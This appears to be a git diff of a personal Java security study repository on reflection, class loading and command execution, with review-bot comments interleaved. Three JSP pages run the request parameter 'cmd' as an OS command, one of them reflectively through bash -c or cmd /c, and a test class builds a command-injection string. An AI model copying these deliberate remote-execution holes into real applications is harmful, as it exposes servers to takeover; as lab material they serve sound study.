diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/Loader.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/Loader.java"
new file mode 100644
index 0000000..d901fbe
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/Loader.java"
@@ -0,0 +1,20 @@
+package com.test.study;
+
+import com.test.pojo.Baka;
+
+public class Loader {
+ public static void main(String[] args) throws Exception {
+ Class bakaClass = Baka.class;
+ System.out.println("=================");
+// Class.forName("com.test.pojo.Baka"); // 触发static
+// System.out.println("==================");
+// Class.forName("com.test.pojo.Baka", false, ClassLoader.getSystemClassLoader()); // 不触发
+// System.out.println("=================");
+// Class.forName("com.test.pojo.Baka", true, ClassLoader.getSystemClassLoader()); // 触发static
+// System.out.println("==================");
+// ClassLoader classLoader = ClassLoader.getSystemClassLoader();
+// classLoader.loadClass("com.test.pojo.Baka"); // 无事发生
+// System.out.println("==================");
+ Baka baka = Baka.class.newInstance(); // 触发无参构造和static
+ }
+}
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/define2Load.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/define2Load.java"
new file mode 100644
index 0000000..0620b0c
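Review bot: `Baka.class.newInstance()` on the last statement of `main` is deprecated since Java 9 because it rethrows any checked exception the constructor throws without declaring it; the supported spelling is `Baka baka = Baka.class.getDeclaredConstructor().newInstance();`, which also compiles on the Java 8 target the pom sets. `Class bakaClass = Baka.class;` is a raw type that is never read, so either drop it or type it as `Class<Baka>` and use it. `define2Load.java` calls `student.newInstance()` the same way.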
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/define2Load.java"
@@ -0,0 +1,27 @@
+package com.test.study;
+
+import java.io.IOException;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
+import java.nio.file.Files;
+import java.nio.file.Paths;
+
+public class define2Load {
+ public static void main(String[] args) throws IOException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, InstantiationException, ClassNotFoundException {
+ ClassLoader classLoader = define2Load.class.getClassLoader();
+ byte[] bytes = Files.readAllBytes(Paths.get("Student.class"));
+ Class clazz = ClassLoader.class;
+// Constructor declaredConstructor = clazz.getDeclaredConstructor();
+// declaredConstructor.setAccessible(true);
+// ClassLoader classLoader = declaredConstructor.newInstance();
+ Method defineClass = clazz.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
+ defineClass.setAccessible(true);
+ Class student = (Class) defineClass.invoke(classLoader, bytes, 0, bytes.length);
+// Class.forName("com.test.pojo.Student");
+ student.newInstance();
+// Class.forName("com.test.pojo.Student");
+ }
+
+
+}
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/tmp.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/tmp.java"
new file mode 100644
index 0000000..3dff7e4
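Review bot: `Paths.get("Student.class")` is resolved against the JVM's working directory, so `main` only works when launched from the ClassLoadStudy module root where this commit places `Student.class`; either document that (`// expects Student.class in the working directory (module root)`) or take the path from `args`. The bytes are defined straight into the application class loader through the reflective `defineClass`, which means the class cannot be defined a second time in that JVM (`LinkageError`), and on Java 16+ `setAccessible(true)` on a protected `ClassLoader` method should throw `InaccessibleObjectException` unless `java.base/java.lang` is opened — worth a comment, since the pom targets 8 and the reader may run it elsewhere. `Class clazz` and `Class student` are raw types; `Class<?>` costs nothing here.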
--- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ClassLoadStudy/src/main/java/com/test/study/tmp.java" @@ -0,0 +1,7 @@ +package com.test.study; + +public class tmp { + public static void main(String[] args) throws ClassNotFoundException { + Class.forName("com.test.pojo.Student"); + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.gitignore" @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa 
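Review bot: `tmp.main` calls `Class.forName("com.test.pojo.Student")`, but ClassLoadStudy has no `com/test/pojo/Student.java` source in this commit — the only `Student.class` is committed at the module root, outside `src` and outside anything Maven puts on the classpath — so this presumably throws `ClassNotFoundException` unless the class file is copied into `target/classes` by hand. Add a comment stating that prerequisite (`// requires Student.class on the classpath, e.g. under target/classes/com/test/pojo/`) or drop the file. The lowercase class names `tmp` and `define2Load` also depart from Java's UpperCamelCase convention.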
--- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/misc.xml" new file mode 100644 index 0000000..8345e46 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/vcs.xml" new file mode 100644 index 0000000..c2365ab --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/vcs.xml" @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/workspace.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/workspace.xml" new file mode 100644 index 0000000..e70c20c 
--- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/.idea/workspace.xml" @@ -0,0 +1,273 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 1759207487740 + + + + + + + + + + jar://$PROJECT_DIR$/../../../../../../sec_software/jdks/jdk-1.8.0_65/src.zip!/java/lang/Runtime.java + 616 + + + + + \ No newline at end of file diff --git a/hessian/HessianStudy/pom.xml "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/pom.xml" similarity index 58% rename from hessian/HessianStudy/pom.xml rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/pom.xml" index dd82d26..8f470e3 100644 --- a/hessian/HessianStudy/pom.xml +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/pom.xml" @@ -1,11 +1,11 @@ 4.0.0 - com.example - HessianStudy + com.test + RceStudy war 1.0-SNAPSHOT - HessianStudy Maven Webapp + RceStudy Maven Webapp http://maven.apache.org @@ -14,23 +14,18 @@ 3.8.1 test - - com.caucho - hessian - 4.0.63 - javax.servlet - servlet-api - 2.5 + javax.servlet-api + 4.0.1 - com.alibaba - fastjson - 1.2.24 + org.apache.commons + commons-io + 1.3.2 - HessianStudy + RceStudy 
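Review bot: The commons-io dependency is declared as `org.apache.commons:commons-io:1.3.2`, a legacy coordinate from 2007; the maintained artifact is `commons-io:commons-io`, and any current release covers the `IOUtils.toString` calls in `ExecFailed` and `Reflection2Runtime`. The ReflectionStudy pom in this commit carries the same declaration. Separately, this commit checks in `RceStudy/.idea/workspace.xml`, which embeds a machine-specific path to a JDK source zip; the ReflectionStudy module's `.idea/.gitignore` excludes `/workspace.xml`, and RceStudy should carry the same ignore.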
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ExecFailed.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ExecFailed.java"
new file mode 100644
index 0000000..4ca8034
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ExecFailed.java"
@@ -0,0 +1,18 @@
+package com.test;
+
+import org.apache.commons.io.IOUtils;
+
+import java.io.IOException;
+import java.io.InputStream;
+
+public class ExecFailed {
+ public static void main(String[] args) throws IOException {
+ String origin = "echo 123";
+ String evil = "|echo 321";
+ String cmd = origin + evil;
+ InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
+ System.out.printf(IOUtils.toString(inputStream));
+ // 123|echo 321
+ // 以空格分割,空格后全是参数,所以管道符没用
+ }
+}
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ProcessBuilderExec.java"
new file mode 100644
index 0000000..fde706a
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/java/com/test/ProcessBuilderExec.java"
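Review bot: `System.out.printf(IOUtils.toString(inputStream))` passes the command's output as the format string, so any `%` in that output raises an `IllegalFormatException` instead of printing; `System.out.print(IOUtils.toString(inputStream, "UTF-8"))` (or `printf("%s", ...)`) fixes that and also replaces the platform-default charset that `IOUtils.toString(InputStream)` uses. The stream is never closed and stderr is never drained, so a command that writes only to stderr shows nothing here. The Chinese comment carries the lesson of the file — `Runtime.exec(String)` tokenizes on whitespace and passes everything after the program name as plain arguments, so the `|` is a literal argument, not a shell pipe — and deserves an English line next to it, e.g. `// exec(String) splits on whitespace; "|echo" and "321" are passed as arguments, never interpreted by a shell`.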
@@ -0,0 +1,11 @@ +package com.test; + +import java.io.IOException; + +public class ProcessBuilderExec { + public static void main(String[] args) throws IOException { + String[] cmd = {"cmd", "/c", "calc"}; + ProcessBuilder processBuilder = new ProcessBuilder(cmd); + processBuilder.start(); + } +} diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/WEB-INF/web.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/WEB-INF/web.xml" new file mode 100644 index 0000000..9f88c1f --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/WEB-INF/web.xml" @@ -0,0 +1,7 @@ + + + + Archetype Created Web Application + diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/index.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/index.jsp" new file mode 100644 index 0000000..c38169b --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/index.jsp" @@ -0,0 +1,5 @@ + + +
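Review bot: `processBuilder.start()` discards the `Process`, so nothing waits for or reads from the child, and the hard-coded `{"cmd", "/c", "calc"}` runs only on Windows. If the point is merely to observe the launch, `new ProcessBuilder(cmd).inheritIO().start().waitFor();` makes both explicit (`main` then needs `throws InterruptedException`), and a one-line comment should state the Windows-only assumption.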

Hello World!

+
+
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/processBuilder.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/processBuilder.jsp"
new file mode 100644
index 0000000..e4a8e64
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/processBuilder.jsp"
@@ -0,0 +1,18 @@
+<%@ page import="java.io.InputStream" %>
+<%@ page import="java.io.ByteArrayOutputStream" %>
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+ // 漏洞触发点
+ String cmd = request.getParameter("cmd");
+ InputStream in = new ProcessBuilder(cmd).start().getInputStream();
+
+ ByteArrayOutputStream results = new ByteArrayOutputStream();
+
+ int l = -1;
+ byte[] b = new byte[1024];
+ while ((l = in.read(b)) != -1) {
+ results.write(b, 0, l);
+ }
+
+ out.println(results);
+%>
\ No newline at end of file
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime.jsp"
new file mode 100644
index 0000000..3bf43c4
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime.jsp"
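Review bot: The `InputStream` from `new ProcessBuilder(cmd).start().getInputStream()` is never closed and stderr is never read, so a failing command leaves an open handle per request and an empty page, and `out.println(results)` decodes the bytes with the platform default charset and writes them into the HTML response unescaped. `runtime.jsp` and `runtime2.jsp` in this commit handle their streams the same way. The page is labelled as the deliberate trigger point of this lab (`// 漏洞触发点`), so the rewrite below keeps the request-sourced command and fixes only the handling around it; switching the page to `contentType="text/plain;charset=UTF-8"` would additionally stop the output from being interpreted as HTML.
```jsp
// 漏洞触发点 — deliberate lab trigger point; the command stays request-controlled
String cmd = request.getParameter("cmd");
if (cmd == null) {
    response.sendError(400);
    return;
}
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();

ByteArrayOutputStream results = new ByteArrayOutputStream();
try (InputStream in = p.getInputStream()) {
    byte[] b = new byte[1024];
    int l;
    while ((l = in.read(b)) != -1) {
        results.write(b, 0, l);
    }
}

out.println(results.toString("UTF-8"));
```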
@@ -0,0 +1,30 @@
+<%--
+ Created by IntelliJ IDEA.
+ User: snowstorm-maxy
+ Date: 2025/9/30
+ Time: 12:50
+ To change this template use File | Settings | File Templates.
+--%>
+<%@ page import="java.io.BufferedReader" %>
+<%@ page import="java.io.InputStreamReader" %>
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+ // 漏洞触发点
+ String cmd = request.getParameter("cmd");
+
+ BufferedReader in = new BufferedReader(
+ new InputStreamReader(
+ Runtime.getRuntime().exec(cmd).getInputStream(),
+ "UTF-8"
+ )
+ );
+
+ String line;
+ StringBuilder results = new StringBuilder();
+ while ((line = in.readLine()) != null) {
+ results.append(line);
+ }
+ in.close();
+
+ out.print(results);
+%>
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime2.jsp" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime2.jsp"
new file mode 100644
index 0000000..ba1cffa
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/RceStudy/src/main/webapp/runtime2.jsp"
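Review bot: `results.append(line)` joins the command's output lines with no separator, so multi-line output is run together on the page; `results.append(line).append('\n')` preserves it (`Reflection2Runtime.java` in this commit has the same loop). `in.close()` runs only on the success path, so a read error leaks the reader; the `BufferedReader` belongs in a try-with-resources, and the unclosed-stream/stderr point raised on `processBuilder.jsp` applies here as well.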
@@ -0,0 +1,54 @@
+<%--
+ Created by IntelliJ IDEA.
+ User: snowstorm-maxy
+ Date: 2025/9/30
+ Time: 12:56
+ To change this template use File | Settings | File Templates.
+--%>
+<%@ page import="java.lang.reflect.Constructor" %>
+<%@ page import="java.lang.reflect.Method" %>
+<%@ page import="java.io.InputStream" %>
+<%@ page import="java.io.ByteArrayOutputStream" %>
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<%
+ // 漏洞触发点
+ String c = request.getParameter("cmd");
+
+ // 根据系统自动调用对应命令
+ String[] cmd;
+ String osName = System.getProperties().getProperty("os.name");
+ if (osName.toLowerCase().contains("windows")) {
+ cmd = new String[]{"cmd", "/c", c};
+ } else {
+ cmd = new String[]{"/bin/bash", "-c", c};
+ }
+
+ // 获取Runtime类对象
+ Class runtimeClass = Class.forName("java.lang.Runtime");
+
+ // 获取构造方法
+ Constructor runtimeConstructor = runtimeClass.getDeclaredConstructor();
+ runtimeConstructor.setAccessible(true);
+
+ // 创建Runtime类实例 相当于 Runtime r = new Runtime();
+ Object runtimeInstance = runtimeConstructor.newInstance();
+
+ // 获取Runtime的exec(String cmd)方法
+ Method runtimeMethod = runtimeClass.getMethod("exec", String[].class);
+
+ // 调用exec方法 等于 r.exec(cmd); cmd参数输入要执行的命令
+ Process p = (Process) runtimeMethod.invoke(runtimeInstance, new Object[]{cmd});
+
+ // 获取命令执行结果
+ InputStream in = p.getInputStream();
+
+ ByteArrayOutputStream results = new ByteArrayOutputStream();
+ byte[] b = new byte[1024];
+ int l = -1;
+
+ while ((l = in.read(b)) != -1) {
+ results.write(b, 0, l);
+ }
+
+ out.print(results);
+%>
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.gitignore"
new file mode 100644
index 0000000..5ff6309
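Review bot: `osName.toLowerCase()` with no `Locale` is locale-sensitive; the conventional form for a programmatic comparison is `osName.toLowerCase(Locale.ROOT)` (with `<%@ page import="java.util.Locale" %>`), and `System.getProperties().getProperty("os.name")` is simply `System.getProperty("os.name")`. `Class runtimeClass` is a raw type and should be `Class<?>`, `Constructor`/`Method` likewise. The stream `in` is never closed and stderr is never read, which is the same handling raised on `processBuilder.jsp`.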
--- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.gitignore" @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/.gitignore" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/.gitignore" new file mode 100644 index 0000000..35410ca --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa 
--- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/misc.xml" new file mode 100644 index 0000000..8345e46 --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/vcs.xml" new file mode 100644 index 0000000..c2365ab --- /dev/null +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/.idea/vcs.xml" @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file 
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/1.txt" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/1.txt" new file mode 100644 index 0000000..ca90535 Binary files /dev/null and "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/1.txt" differ diff --git a/JNDI/JNDI_vul/client/pom.xml "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/pom.xml" similarity index 61% rename from JNDI/JNDI_vul/client/pom.xml rename to "Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/pom.xml" index 09045e5..3737817 100644 --- a/JNDI/JNDI_vul/client/pom.xml +++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/pom.xml" @@ -3,13 +3,10 @@ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> 4.0.0 - - org.example - JNDI - 1.0-SNAPSHOT - - client + com.test + ReflectionStudy + 1.0-SNAPSHOT 8 @@ -17,4 +14,12 @@ UTF-8 + + + org.apache.commons + commons-io + 1.3.2 + + + \ No newline at end of file 
diff --git "a/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Baka.java"
new file mode 100644
index 0000000..63aed70
--- /dev/null
+++ "b/Java\345\237\272\347\241\200/\345\217\215\345\260\204+\347\261\273\345\212\240\350\275\275+\345\221\275\344\273\244\346\211\247\350\241\214/ReflectionStudy/src/main/java/com/test/pojo/Baka.java"
@@ -0,0 +1,62 @@
+package com.test.pojo;
+
+public class Baka extends Object{
+ public String name;
+ protected int gender;
+ private int age;
+
+ public Baka() {
+ System.out.println("Baka⑨");
+ }
+
+ public Baka(String name, int gender, int age) {
+ this.name = name;
+ this.gender = gender;
+ this.age = age;
+ System.out.println(name + " " + gender + " " + age);
+ }
+
+ public static void sit(String name) {
+ System.out.println("sit " + name);
+ }
+
+ public void hello(String name) {
+ System.out.println("hello " + name);
+ }
+
+ protected void hug(String name) {
+ System.out.println("hug " + name);
+ }
+
+ private void kiss(String name) {
+ System.out.println("kiss " + name);
+ }
+
+ private void kiss(String alias, String name) {
+ System.out.println("kiss " + alias + "(" + name + ")");
+ }
+
+ public String getName() {
+ return name;
+ }
+
+ public void setName(String name) {
+ this.name = name;
+ }
+
